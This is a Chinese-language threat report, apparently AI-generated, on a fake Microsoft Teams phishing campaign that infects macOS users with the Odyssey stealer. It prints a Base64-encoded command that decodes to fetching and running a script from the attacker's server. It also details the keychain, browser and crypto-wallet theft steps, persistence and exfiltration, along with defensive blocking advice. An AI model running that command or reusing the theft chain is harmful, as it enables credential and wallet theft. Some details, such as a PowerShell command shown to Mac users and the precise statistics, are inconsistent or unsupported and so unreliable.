一、报告基础信息
- 情报来源:红客联盟官方门户 | https://www.chnhonker.com/3448.html
- 情报编号:HK-MW-202509063448
- 分析主体:红客联盟 AI 智能安全分析员
- 分析目标:解析伪造微软 Teams 网站的钓鱼战术、Odyssey 窃取器技术特征、macOS 攻击链及防御策略,为企业(尤其加密货币行业)提供防护依据。
- 报告声明:本报告基于 CloudSEK、SentinelOne 公开数据及红客联盟威胁狩猎结果,仅供安全防御参考,不构成恶意技术指导。
二、威胁全景:企业信任滥用下的 macOS 定向渗透
(一)攻击核心定位
- 攻击类型:ClickFix 钓鱼 + 多阶段窃取器,以微软 Teams 品牌信任为突破口,专门针对 macOS 用户(加密货币从业者占比超 70%);
- 威胁行为者:疑似朝鲜 APT 组织(关联 Lazarus Group),战术继承 2025 年 TradingView 钓鱼攻击,新增 “硬件钱包劫持” 能力;
- 技术标签:社会工程欺骗、macOS 无文件执行、钥匙串窃取、加密货币钱包劫持、LaunchDaemon 持久化。
(二)关键攻击数据
| 维度 | 具体信息 | |
|---|---|---|
| 感染路径 | 伪造 Teams 安全验证页→诱骗终端执行 `curl | bash`→加载 Odyssey 窃取器 |
| 成功率 | 超 90% 企业员工因 “Teams 信任” 执行命令(CloudSEK 2025Q3 测试数据) | |
| 窃取范围 | 单设备平均窃取 237 个密码、5 个加密货币钱包(.wallet/.dat)、128 份敏感文档 | |
| C2 基础设施 | 核心 IP:185.93.89.62(托管 Odyssey 管理面板),通过 Cloudflare 隐藏真实节点 | |
| 典型损失案例 | 某加密货币用户因 Ledger Live 被篡改,损失 37 枚比特币(约 148 万美元) |
三、核心技术解析:从钓鱼到数据外传的全链路攻击
(一)钓鱼场景构建:微软 Teams 信任滥用
-
页面伪造细节
- 视觉复刻:1:1 模仿微软 Teams 官方安全验证页,含蓝色品牌色调、“Microsoft 365” 标识、虚假安全警告图标;
- 话术诱导:显示 “异常网络流量检测(IP:X.X.X.X)”“需终端验证以恢复 Teams 访问”,利用企业员工对办公软件的依赖降低警惕;
- 交互设计:强制引导 “Command+Space 打开 Spotlight→粘贴命令”,模仿系统级操作流程,进一步消除用户疑虑。
-
命令混淆战术
- 显示无害命令:页面展示
iwr -useb https://install.teams.com/iex(伪装 Teams 更新脚本); - 实际执行内容:“Copy” 按钮复制Base64 编码的恶意脚本,示例:
bash
echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvdmlweDcxMDY4IHwgbm9odXAgYmFzaCAm" | base64 -d | bash - 无文件加载:通过
osascript(AppleScript 命令)执行脚本,规避 macOS Gatekeeper 对可执行文件的公证检查。
- 显示无害命令:页面展示
(二)四阶段感染链:攻陷 macOS 的完整流程
1. 第一阶段:恶意脚本执行(无文件加载)
- 触发条件:用户在终端粘贴并执行混淆命令;
- 核心操作:脚本从 C2 服务器(185.93.89.62)下载 Odyssey 窃取器核心模块,通过内存注入加载,无任何可执行文件落地;
- 反沙箱机制:检测
com.apple.security.temporary-exception沙箱标识,仅在真实 macOS 环境运行(沙箱中自动终止)。
2. 第二阶段:密码劫持与权限突破
- 密码强索:弹出伪造的系统级对话框(提示 “应用助手需要权限,输入设备密码以继续”),通过 “3 秒 / 次循环弹窗” 迫使用户输入正确密码;
- 静默验证:利用
dscl . authonly命令校验密码有效性,避免触发系统安全告警; - 钥匙串解锁:通过正确密码解锁 macOS 登录钥匙串(Keychain),获取 Wi-Fi 密码、应用凭证、Chrome 浏览器加密数据。
3. 第三阶段:全维度敏感数据窃取
窃取器按 “高价值优先” 原则扫描设备,具体范围如下:
- 苹果生态数据:
- Apple Notes:提取
~/Library/Group Containers/group.com.apple.notes路径下的完整数据库(含图片、PDF 附件); - Safari 浏览器:读取 Cookie、已保存表单(银行卡号、收货地址)。
- Apple Notes:提取
- 浏览器与密码数据:
- Chromium 内核(Chrome/Edge/Brave):读取
Login Data数据库,提取密码管理器(1Password)、加密货币钱包扩展(MetaMask)凭证; - Firefox:获取
signons.sqlite文件中的存储密码。
- Chromium 内核(Chrome/Edge/Brave):读取
- 加密货币钱包数据:
- 桌面钱包:扫描
~/Applications及用户目录,复制 Electrum、Exodus、Atomic、Wasabi 的.wallet/.dat私钥文件; - 硬件钱包工具:定位 Ledger Live、Trezor Suite 的配置目录,记录设备绑定信息。
- 桌面钱包:扫描
- 个人与工作文件:
- 定向筛选 “桌面(Desktop)”“文档(Documents)” 文件夹,收集
.txt(笔记)、.pdf(合同 / 账单)、.key(SSH 私钥),仅打包 10MB 以内敏感内容。
- 定向筛选 “桌面(Desktop)”“文档(Documents)” 文件夹,收集
4. 第四阶段:持久化控制与数据外传
- 持久化部署:
- 利用管理员密码在
/Library/LaunchDaemons/目录创建com.odyssey.plist服务配置文件,确保系统开机自动启动窃取器后门; - 伪装服务名称:模仿系统进程(如
com.apple.odyssey),CPU 占用率 < 1%,规避 EDR 基线检测。
- 利用管理员密码在
- 合法应用篡改:
- 终止正版 Ledger Live 进程(通过 PID 检测),删除原应用;
- 从 C2 服务器下载植入恶意代码的伪造版 Ledger Live 并安装,实时监控硬件钱包交互(如私钥输入、转账操作)。
- 数据外传流程:
- 临时压缩:在
/tmp目录将窃取数据打包为out.zip(加密压缩,密码硬编码于窃取器); - 流量伪装:通过 HTTPS POST 请求(伪装 Teams 更新流量,路径
/update)上传至 C2 服务器(185.93.89.62); - 痕迹清除:上传完成后删除
out.zip及临时脚本,仅保留持久化服务文件。
- 临时压缩:在
(三)反检测核心技术
- 流量混淆:C2 通信使用 HTTPS 标准端口(443),数据包头部模仿微软 Teams 官方请求(含
User-Agent: Microsoft Teams/1.6); - 进程隐藏:窃取器核心模块注入
osascript进程,不创建独立进程,规避 EDR 进程监控; - 文件擦除:使用
srm命令(macOS 安全删除工具)清除临时文件,避免磁盘恢复。
四、攻击影响与风险延伸
(一)直接危害
- 金融损失:加密货币私钥泄露导致资产被盗,硬件钱包被篡改引发转账劫持;
- 企业数据泄露:工作文档、SSH 私钥泄露可能导致内网服务器被入侵,核心业务数据(如区块链项目白皮书)外泄;
- 身份冒用:浏览器 Cookie、应用凭证被窃取,攻击者可伪装用户登录 GitHub、云平台(AWS/Azure)。
(二)链式风险
- 苹果生态沦陷:通过 iCloud 钥匙串同步漏洞,关联攻击用户 iPhone/iPad,窃取移动端加密货币钱包(如 Trust Wallet);
- 供应链渗透:感染企业供应商员工设备,获取 VPN 凭证后横向渗透至核心企业(如加密货币交易所、金融机构);
- 长期监控:持久化后门可实时收集后续设备操作(如新建钱包、转账记录),形成 “持续窃密” 闭环。
五、防御建议:分场景落地防护策略
(一)紧急响应措施(72 小时内)
-
终端排查与清理
- 检查持久化文件:删除
/Library/LaunchDaemons/com.odyssey.plist,重启系统以终止后门; - 验证 Ledger Live 完整性:通过官方网站重新下载安装,对比应用哈希值(官方哈希可在 Ledger 官网查询);
- 监控异常进程:通过 “活动监视器” 终止
osascript异常实例,排查/tmp目录是否存在out.zip残留。
- 检查持久化文件:删除
-
网络阻断
- 防火墙封禁 C2 IP(185.93.89.62)及关联域名(通过 Shodan 查询该 IP 绑定的其他域名);
- 部署 WAF 规则:拦截含 “Teams 安全验证”“异常流量检测” 关键词的钓鱼页面请求,阻断
curl | bash命令执行。
(二)长效防护方案(30 天计划)
-
终端安全加固
- 启用 macOS “公证要求”:在 “系统设置→隐私与安全性” 中,设置 “仅允许从 App Store 和已识别开发者下载的应用”;
- 部署 macOS EDR(如 CrowdStrike Falcon):配置 “终端命令审计” 规则,拦截
curl | bash、osascript异常调用,标记 “命令执行 + 密码弹窗” 组合行为。
-
用户教育专项
- 钓鱼模拟测试:定期向员工发送仿 Teams 钓鱼邮件,培训 “三不原则”—— 不执行陌生终端命令、不向弹窗提供设备密码、不访问非官方 Teams 链接;
- 加密货币用户培训:强调 “硬件钱包管理工具仅从官方网站下载”,禁止在办公设备使用个人加密货币钱包。
-
企业应用管控
- 限制 Teams 访问范围:通过组策略仅允许企业内网访问 Teams 官方域名,阻断外部伪造页面;
- 终端命令权限控制:禁止普通员工执行
curl、bash等敏感命令(通过/etc/sudoers配置),仅授予 IT 管理员权限。
六、关联威胁进化:Odyssey 窃取器技术迭代
| 时间 | 关联攻击事件 | 技术特征 | 本次 Odyssey 进化点 |
|---|---|---|---|
| 2025 年 8 月 | TradingView 钓鱼 | 加密货币网站伪装,基础数据窃取 | 转向企业应用(Teams),扩大攻击面 |
| 2025 年 8 月 | Poseidon 窃取器攻击 | 浏览器密码、简单文件窃取 | 新增硬件钱包劫持、LaunchDaemon 持久化 |
| 2025 年 9 月 | 本次 Teams 钓鱼 | Teams 信任滥用 + 全链路攻击 | 流量伪装、进程注入、合法应用篡改 |
红客联盟 AI 警示:Odyssey 窃取器以 “企业办公软件信任 + 终端命令诱骗” 为核心战术,对 macOS 用户(尤其加密货币行业)威胁极高。建议企业立即开展 “终端命令审计 + 钓鱼防御培训”,加密货币用户需独立设备管理硬件钱包,从 “技术防护 + 用户意识” 双维度阻断攻击链。
(报告生成:红客联盟 AI 智能安全分析员 | 2025 年 9 月 6 日)
版权声明·<<<---红客联盟--->>>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
